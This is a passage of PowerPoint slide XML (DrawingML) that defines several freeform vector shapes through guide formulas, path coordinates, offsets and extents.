                  <a:gd name="T66" fmla="*/ 393 w 589"/>
                  <a:gd name="T67" fmla="*/ 0 h 495"/>
                  <a:gd name="T68" fmla="*/ 441 w 589"/>
                  <a:gd name="T69" fmla="*/ 6 h 495"/>
                  <a:gd name="T70" fmla="*/ 514 w 589"/>
                  <a:gd name="T71" fmla="*/ 53 h 495"/>
                  <a:gd name="T72" fmla="*/ 540 w 589"/>
                  <a:gd name="T73" fmla="*/ 90 h 495"/>
                  <a:gd name="T74" fmla="*/ 567 w 589"/>
                  <a:gd name="T75" fmla="*/ 132 h 495"/>
                  <a:gd name="T76" fmla="*/ 588 w 589"/>
                  <a:gd name="T77" fmla="*/ 216 h 495"/>
                  <a:gd name="T78" fmla="*/ 572 w 589"/>
                  <a:gd name="T79" fmla="*/ 294 h 495"/>
                  <a:gd name="T80" fmla="*/ 556 w 589"/>
                  <a:gd name="T81" fmla="*/ 326 h 495"/>
                  <a:gd name="T82" fmla="*/ 493 w 589"/>
                  <a:gd name="T83" fmla="*/ 378 h 495"/>
                  <a:gd name="T84" fmla="*/ 393 w 589"/>
                  <a:gd name="T85" fmla="*/ 279 h 495"/>
                  <a:gd name="T86" fmla="*/ 430 w 589"/>
                  <a:gd name="T87" fmla="*/ 258 h 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589" h="495">
                    <a:moveTo>
                      <a:pt x="430" y="258"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="430" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="258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0" name="Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7337425" y="2811463"/>
                <a:ext cx="231775" cy="214312"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 136 w 646"/>
                  <a:gd name="T1" fmla="*/ 441 h 595"/>
                  <a:gd name="T2" fmla="*/ 136 w 646"/>
                  <a:gd name="T3" fmla="*/ 441 h 595"/>
                  <a:gd name="T4" fmla="*/ 94 w 646"/>
                  <a:gd name="T5" fmla="*/ 426 h 595"/>
                  <a:gd name="T6" fmla="*/ 73 w 646"/>
                  <a:gd name="T7" fmla="*/ 415 h 595"/>
                  <a:gd name="T8" fmla="*/ 58 w 646"/>
                  <a:gd name="T9" fmla="*/ 404 h 595"/>
                  <a:gd name="T10" fmla="*/ 58 w 646"/>
                  <a:gd name="T11" fmla="*/ 404 h 595"/>
                  <a:gd name="T12" fmla="*/ 31 w 646"/>
                  <a:gd name="T13" fmla="*/ 373 h 595"/>
                  <a:gd name="T14" fmla="*/ 15 w 646"/>
                  <a:gd name="T15" fmla="*/ 331 h 595"/>
                  <a:gd name="T16" fmla="*/ 15 w 646"/>
                  <a:gd name="T17" fmla="*/ 331 h 595"/>
                  <a:gd name="T18" fmla="*/ 5 w 646"/>
                  <a:gd name="T19" fmla="*/ 300 h 595"/>
                  <a:gd name="T20" fmla="*/ 0 w 646"/>
                  <a:gd name="T21" fmla="*/ 273 h 595"/>
                  <a:gd name="T22" fmla="*/ 5 w 646"/>
                  <a:gd name="T23" fmla="*/ 247 h 595"/>
                  <a:gd name="T24" fmla="*/ 11 w 646"/>
                  <a:gd name="T25" fmla="*/ 221 h 595"/>
                  <a:gd name="T26" fmla="*/ 11 w 646"/>
                  <a:gd name="T27" fmla="*/ 221 h 595"/>
                  <a:gd name="T28" fmla="*/ 26 w 646"/>
                  <a:gd name="T29" fmla="*/ 200 h 595"/>
                  <a:gd name="T30" fmla="*/ 47 w 646"/>
                  <a:gd name="T31" fmla="*/ 179 h 595"/>
                  <a:gd name="T32" fmla="*/ 73 w 646"/>
                  <a:gd name="T33" fmla="*/ 158 h 595"/>
                  <a:gd name="T34" fmla="*/ 110 w 646"/>
                  <a:gd name="T35" fmla="*/ 142 h 595"/>
                  <a:gd name="T36" fmla="*/ 499 w 646"/>
                  <a:gd name="T37" fmla="*/ 0 h 595"/>
                  <a:gd name="T38" fmla="*/ 551 w 646"/>
                  <a:gd name="T39" fmla="*/ 137 h 595"/>
                  <a:gd name="T40" fmla="*/ 189 w 646"/>
                  <a:gd name="T41" fmla="*/ 268 h 595"/>
                  <a:gd name="T42" fmla="*/ 189 w 646"/>
                  <a:gd name="T43" fmla="*/ 268 h 595"/>
                  <a:gd name="T44" fmla="*/ 158 w 646"/>
                  <a:gd name="T45" fmla="*/ 284 h 595"/>
                  <a:gd name="T46" fmla="*/ 136 w 646"/>
                  <a:gd name="T47" fmla="*/ 305 h 595"/>
                  <a:gd name="T48" fmla="*/ 136 w 646"/>
                  <a:gd name="T49" fmla="*/ 305 h 595"/>
                  <a:gd name="T50" fmla="*/ 131 w 646"/>
                  <a:gd name="T51" fmla="*/ 326 h 595"/>
                  <a:gd name="T52" fmla="*/ 136 w 646"/>
                  <a:gd name="T53" fmla="*/ 352 h 595"/>
                  <a:gd name="T54" fmla="*/ 136 w 646"/>
                  <a:gd name="T55" fmla="*/ 352 h 595"/>
                  <a:gd name="T56" fmla="*/ 141 w 646"/>
                  <a:gd name="T57" fmla="*/ 368 h 595"/>
                  <a:gd name="T58" fmla="*/ 152 w 646"/>
                  <a:gd name="T59" fmla="*/ 384 h 595"/>
                  <a:gd name="T60" fmla="*/ 162 w 646"/>
                  <a:gd name="T61" fmla="*/ 394 h 595"/>
                  <a:gd name="T62" fmla="*/ 178 w 646"/>
                  <a:gd name="T63" fmla="*/ 399 h 595"/>
                  <a:gd name="T64" fmla="*/ 194 w 646"/>
                  <a:gd name="T65" fmla="*/ 404 h 595"/>
                  <a:gd name="T66" fmla="*/ 210 w 646"/>
                  <a:gd name="T67" fmla="*/ 404 h 595"/>
                  <a:gd name="T68" fmla="*/ 252 w 646"/>
                  <a:gd name="T69" fmla="*/ 394 h 595"/>
                  <a:gd name="T70" fmla="*/ 598 w 646"/>
                  <a:gd name="T71" fmla="*/ 263 h 595"/>
                  <a:gd name="T72" fmla="*/ 645 w 646"/>
                  <a:gd name="T73" fmla="*/ 399 h 595"/>
                  <a:gd name="T74" fmla="*/ 121 w 646"/>
                  <a:gd name="T75" fmla="*/ 594 h 595"/>
                  <a:gd name="T76" fmla="*/ 73 w 646"/>
                  <a:gd name="T77" fmla="*/ 462 h 595"/>
                  <a:gd name="T78" fmla="*/ 136 w 646"/>
                  <a:gd name="T79" fmla="*/ 441 h 5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46" h="595">
                    <a:moveTo>
                      <a:pt x="136" y="441"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="136" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="441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1" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7389813" y="2998788"/>
                <a:ext cx="228600" cy="114300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 577 w 636"/>
                  <a:gd name="T1" fmla="*/ 131 h 316"/>
                  <a:gd name="T2" fmla="*/ 504 w 636"/>
                  <a:gd name="T3" fmla="*/ 152 h 316"/>
                  <a:gd name="T4" fmla="*/ 504 w 636"/>
                  <a:gd name="T5" fmla="*/ 152 h 316"/>
                  <a:gd name="T6" fmla="*/ 504 w 636"/>
                  <a:gd name="T7" fmla="*/ 152 h 316"/>
                  <a:gd name="T8" fmla="*/ 546 w 636"/>
                  <a:gd name="T9" fmla="*/ 168 h 316"/>
                  <a:gd name="T10" fmla="*/ 582 w 636"/>
                  <a:gd name="T11" fmla="*/ 184 h 316"/>
                  <a:gd name="T12" fmla="*/ 582 w 636"/>
                  <a:gd name="T13" fmla="*/ 184 h 316"/>
                  <a:gd name="T14" fmla="*/ 598 w 636"/>
                  <a:gd name="T15" fmla="*/ 200 h 316"/>
                  <a:gd name="T16" fmla="*/ 609 w 636"/>
                  <a:gd name="T17" fmla="*/ 215 h 316"/>
                  <a:gd name="T18" fmla="*/ 619 w 636"/>
                  <a:gd name="T19" fmla="*/ 231 h 316"/>
                  <a:gd name="T20" fmla="*/ 630 w 636"/>
                  <a:gd name="T21" fmla="*/ 252 h 316"/>
                  <a:gd name="T22" fmla="*/ 630 w 636"/>
                  <a:gd name="T23" fmla="*/ 252 h 316"/>
                  <a:gd name="T24" fmla="*/ 630 w 636"/>
                  <a:gd name="T25" fmla="*/ 262 h 316"/>
                  <a:gd name="T26" fmla="*/ 630 w 636"/>
                  <a:gd name="T27" fmla="*/ 262 h 316"/>
                  <a:gd name="T28" fmla="*/ 635 w 636"/>
                  <a:gd name="T29" fmla="*/ 278 h 316"/>
                  <a:gd name="T30" fmla="*/ 504 w 636"/>
                  <a:gd name="T31" fmla="*/ 315 h 316"/>
                  <a:gd name="T32" fmla="*/ 504 w 636"/>
                  <a:gd name="T33" fmla="*/ 315 h 316"/>
                  <a:gd name="T34" fmla="*/ 498 w 636"/>
                  <a:gd name="T35" fmla="*/ 294 h 316"/>
                  <a:gd name="T36" fmla="*/ 498 w 636"/>
                  <a:gd name="T37" fmla="*/ 294 h 316"/>
                  <a:gd name="T38" fmla="*/ 493 w 636"/>
                  <a:gd name="T39" fmla="*/ 273 h 316"/>
                  <a:gd name="T40" fmla="*/ 493 w 636"/>
                  <a:gd name="T41" fmla="*/ 273 h 316"/>
                  <a:gd name="T42" fmla="*/ 478 w 636"/>
                  <a:gd name="T43" fmla="*/ 236 h 316"/>
                  <a:gd name="T44" fmla="*/ 478 w 636"/>
                  <a:gd name="T45" fmla="*/ 236 h 316"/>
                  <a:gd name="T46" fmla="*/ 462 w 636"/>
                  <a:gd name="T47" fmla="*/ 221 h 316"/>
                  <a:gd name="T48" fmla="*/ 451 w 636"/>
                  <a:gd name="T49" fmla="*/ 210 h 316"/>
                  <a:gd name="T50" fmla="*/ 451 w 636"/>
                  <a:gd name="T51" fmla="*/ 210 h 316"/>
                  <a:gd name="T52" fmla="*/ 430 w 636"/>
                  <a:gd name="T53" fmla="*/ 200 h 316"/>
                  <a:gd name="T54" fmla="*/ 409 w 636"/>
                  <a:gd name="T55" fmla="*/ 194 h 316"/>
                  <a:gd name="T56" fmla="*/ 409 w 636"/>
                  <a:gd name="T57" fmla="*/ 194 h 316"/>
                  <a:gd name="T58" fmla="*/ 388 w 636"/>
                  <a:gd name="T59" fmla="*/ 194 h 316"/>
                  <a:gd name="T60" fmla="*/ 362 w 636"/>
                  <a:gd name="T61" fmla="*/ 200 h 316"/>
                  <a:gd name="T62" fmla="*/ 42 w 636"/>
                  <a:gd name="T63" fmla="*/ 294 h 316"/>
                  <a:gd name="T64" fmla="*/ 0 w 636"/>
                  <a:gd name="T65" fmla="*/ 157 h 316"/>
                  <a:gd name="T66" fmla="*/ 535 w 636"/>
                  <a:gd name="T67" fmla="*/ 0 h 316"/>
                  <a:gd name="T68" fmla="*/ 577 w 636"/>
                  <a:gd name="T69" fmla="*/ 131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36" h="316">
                    <a:moveTo>
                      <a:pt x="577" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="131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2" name="Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7423150" y="3103563"/>
                <a:ext cx="274638" cy="117475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 578 w 763"/>
                  <a:gd name="T1" fmla="*/ 184 h 326"/>
                  <a:gd name="T2" fmla="*/ 37 w 763"/>
                  <a:gd name="T3" fmla="*/ 325 h 326"/>
                  <a:gd name="T4" fmla="*/ 0 w 763"/>
                  <a:gd name="T5" fmla="*/ 184 h 326"/>
                  <a:gd name="T6" fmla="*/ 541 w 763"/>
                  <a:gd name="T7" fmla="*/ 47 h 326"/>
                  <a:gd name="T8" fmla="*/ 578 w 763"/>
                  <a:gd name="T9" fmla="*/ 184 h 326"/>
                  <a:gd name="T10" fmla="*/ 762 w 763"/>
                  <a:gd name="T11" fmla="*/ 137 h 326"/>
                  <a:gd name="T12" fmla="*/ 646 w 763"/>
                  <a:gd name="T13" fmla="*/ 168 h 326"/>
                  <a:gd name="T14" fmla="*/ 609 w 763"/>
                  <a:gd name="T15" fmla="*/ 31 h 326"/>
                  <a:gd name="T16" fmla="*/ 725 w 763"/>
                  <a:gd name="T17" fmla="*/ 0 h 326"/>
                  <a:gd name="T18" fmla="*/ 762 w 763"/>
                  <a:gd name="T19" fmla="*/ 137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63" h="326">
                    <a:moveTo>
                      <a:pt x="578" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="184"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="762" y="137"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="646" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="137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3" name="Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7451725" y="3198813"/>
                <a:ext cx="258763" cy="147637"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 719 w 720"/>
                  <a:gd name="T1" fmla="*/ 179 h 411"/>
                  <a:gd name="T2" fmla="*/ 562 w 720"/>
                  <a:gd name="T3" fmla="*/ 210 h 411"/>
                  <a:gd name="T4" fmla="*/ 577 w 720"/>
                  <a:gd name="T5" fmla="*/ 294 h 411"/>
                  <a:gd name="T6" fmla="*/ 483 w 720"/>
                  <a:gd name="T7" fmla="*/ 310 h 411"/>
                  <a:gd name="T8" fmla="*/ 467 w 720"/>
                  <a:gd name="T9" fmla="*/ 232 h 411"/>
                  <a:gd name="T10" fmla="*/ 168 w 720"/>
                  <a:gd name="T11" fmla="*/ 294 h 411"/>
                  <a:gd name="T12" fmla="*/ 168 w 720"/>
                  <a:gd name="T13" fmla="*/ 294 h 411"/>
                  <a:gd name="T14" fmla="*/ 142 w 720"/>
                  <a:gd name="T15" fmla="*/ 300 h 411"/>
                  <a:gd name="T16" fmla="*/ 126 w 720"/>
                  <a:gd name="T17" fmla="*/ 316 h 411"/>
                  <a:gd name="T18" fmla="*/ 126 w 720"/>
                  <a:gd name="T19" fmla="*/ 316 h 411"/>
                  <a:gd name="T20" fmla="*/ 121 w 720"/>
                  <a:gd name="T21" fmla="*/ 331 h 411"/>
                  <a:gd name="T22" fmla="*/ 121 w 720"/>
                  <a:gd name="T23" fmla="*/ 357 h 411"/>
                  <a:gd name="T24" fmla="*/ 121 w 720"/>
                  <a:gd name="T25" fmla="*/ 357 h 411"/>
                  <a:gd name="T26" fmla="*/ 126 w 720"/>
                  <a:gd name="T27" fmla="*/ 373 h 411"/>
                  <a:gd name="T28" fmla="*/ 126 w 720"/>
                  <a:gd name="T29" fmla="*/ 373 h 411"/>
                  <a:gd name="T30" fmla="*/ 131 w 720"/>
                  <a:gd name="T31" fmla="*/ 389 h 411"/>
                  <a:gd name="T32" fmla="*/ 32 w 720"/>
                  <a:gd name="T33" fmla="*/ 410 h 411"/>
                  <a:gd name="T34" fmla="*/ 32 w 720"/>
                  <a:gd name="T35" fmla="*/ 410 h 411"/>
                  <a:gd name="T36" fmla="*/ 21 w 720"/>
                  <a:gd name="T37" fmla="*/ 363 h 411"/>
                  <a:gd name="T38" fmla="*/ 21 w 720"/>
                  <a:gd name="T39" fmla="*/ 363 h 411"/>
                  <a:gd name="T40" fmla="*/ 11 w 720"/>
                  <a:gd name="T41" fmla="*/ 316 h 411"/>
                  <a:gd name="T42" fmla="*/ 11 w 720"/>
                  <a:gd name="T43" fmla="*/ 316 h 411"/>
                  <a:gd name="T44" fmla="*/ 5 w 720"/>
                  <a:gd name="T45" fmla="*/ 279 h 411"/>
                  <a:gd name="T46" fmla="*/ 0 w 720"/>
                  <a:gd name="T47" fmla="*/ 247 h 411"/>
                  <a:gd name="T48" fmla="*/ 0 w 720"/>
                  <a:gd name="T49" fmla="*/ 247 h 411"/>
                  <a:gd name="T50" fmla="*/ 5 w 720"/>
                  <a:gd name="T51" fmla="*/ 226 h 411"/>
                  <a:gd name="T52" fmla="*/ 16 w 720"/>
                  <a:gd name="T53" fmla="*/ 206 h 411"/>
                  <a:gd name="T54" fmla="*/ 16 w 720"/>
                  <a:gd name="T55" fmla="*/ 206 h 411"/>
                  <a:gd name="T56" fmla="*/ 32 w 720"/>
                  <a:gd name="T57" fmla="*/ 189 h 411"/>
                  <a:gd name="T58" fmla="*/ 58 w 720"/>
                  <a:gd name="T59" fmla="*/ 179 h 411"/>
                  <a:gd name="T60" fmla="*/ 58 w 720"/>
